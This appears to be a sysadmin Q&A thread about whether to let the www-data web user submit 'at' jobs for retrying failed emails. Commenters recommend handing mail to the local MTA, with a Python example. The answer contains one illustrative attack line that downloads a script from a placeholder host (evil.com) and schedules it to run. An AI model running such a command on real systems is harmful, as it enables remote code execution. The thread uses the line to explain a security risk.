
I have a cgi script that is resending an email on a failed attempt 5-10 minutes after a user accesses a page. My thought was to do this using the at command from a python call (os.system("at now + 5 minutes <<< ' python resend.py data'")). Testing revealed:

$ sudo su www-data
$ at now
You do not have permission to use at.
$

What sort of grief am I exposing myself to if I remove user 'www-data' from the /etc/at.deny file?

Jamie
  • What sort of reason do you have for ***wanting*** the `www-data` user to be able to submit `at` jobs? -- "resending an email" is not something one would normally do with `at`... – voretaq7 Nov 20 '13 at 18:27
  • @voretaq7 The bigger question really is 'How can I retry sending an email from a cgi script?' At present, a CGI script sends an email; on occasion that fails and we have to traverse the logs to look for failures. Submitting an `at` job on email failure would lessen our burden. – Jamie Nov 20 '13 at 18:45
  • That's not the CGI script's job -- You submit the email to your local MTA (which should really never fail. If it is fix *that* problem). If you're trying to deal with all the possible ways SMTP email can go wrong via your web application, ***don't***. Email isn't reliable message delivery, and you shouldn't try to hack it into being reliable. You're just going to go down the rabbit hole of nasty hacks and multi-layer special cases if you try. – voretaq7 Nov 20 '13 at 18:52
  • @voretaq7 Good advice. But I'm new to python and didn't see a simple MTA interface. I'll look further. – Jamie Nov 20 '13 at 18:56
  • http://docs.python.org/2/library/email-examples.html http://docs.python.org/2/library/smtplib.html http://stackoverflow.com/questions/73781/sending-mail-via-sendmail-from-python – Zoredache Nov 20 '13 at 19:31
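What the comments recommend instead of scheduling a retry with `at`, written up as an added example (not code from the question or the answers): hand the message to the MTA listening on localhost and let its queue do the retrying, so `www-data` needs no `at` access at all. `FakeLocalMTA` is a constructed stand-in for `smtplib.SMTP` so the block runs without a mail daemon; the addresses are made up.

```python
import logging
import smtplib
from email.message import EmailMessage
from email.utils import formatdate, make_msgid

def build_message(sender, recipient, subject, body):
    """Assemble an RFC 5322 message with the headers a local MTA expects."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg["Date"] = formatdate(localtime=True)
    msg["Message-ID"] = make_msgid()
    msg.set_content(body)
    return msg

def submit_to_local_mta(msg, smtp_factory=smtplib.SMTP, host="localhost", port=25):
    """Hand the message to the MTA on localhost. True means it was accepted
    (250 after DATA) and the MTA's own queue now handles retries, so no `at`
    job is needed; False means the MTA itself was unreachable or refused."""
    try:
        with smtp_factory(host, port, timeout=10) as smtp:
            smtp.send_message(msg)
        return True
    except (smtplib.SMTPException, OSError) as exc:
        # A refused local submission is a host problem to fix, not
        # something to paper over with a delayed retry from the CGI script.
        logging.getLogger("cgi-mail").error(
            "local MTA did not accept %s: %r", msg["Message-ID"], exc)
        return False

class FakeLocalMTA:
    """Constructed stand-in for smtplib.SMTP so the example runs offline.
    Records accepted messages; set `refuse = True` to simulate a daemon
    that is down or rejecting connections."""
    accepted = []
    refuse = False

    def __init__(self, host, port, timeout=None):
        if self.refuse:
            raise ConnectionRefusedError(f"{host}:{port}")

    def __enter__(self):
        return self

    def __exit__(self, *exc_info):
        return False

    def send_message(self, msg):
        self.accepted.append(msg)
```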

1 Answer


By making that proposed change, you are allowing the user Apache runs as to execute jobs in the future, at a later time.... I dunno if this is possible, but if you were able to subvert a webserver to execute server-side something like

exec("cd /tmp && wget http://evil.com/evil.php && at laterdate /tmp/evil.php")

this would exec that downloaded PHP script at a later time.

It's basically a one-time cron, and to be honest, I usually disable it in favor of Jenkins.

nandoP
  • It is a one time `cron`. But I don't understand "i usually disable it, in favor of jenkins". What do you disable, and what is jenkins? – Jamie Nov 20 '13 at 18:13
  • @jamie, jenkins is the continuous integration solution to all the world's problems – nandoP Nov 20 '13 at 18:14
  • But if the attacker would be able to get as far as to execute this I would say he could do the same amount of evil without using the `at` command...?! The only difference is that he can delay the evil.... it's evil regardless... – TheStoryCoder Jun 23 '17 at 10:13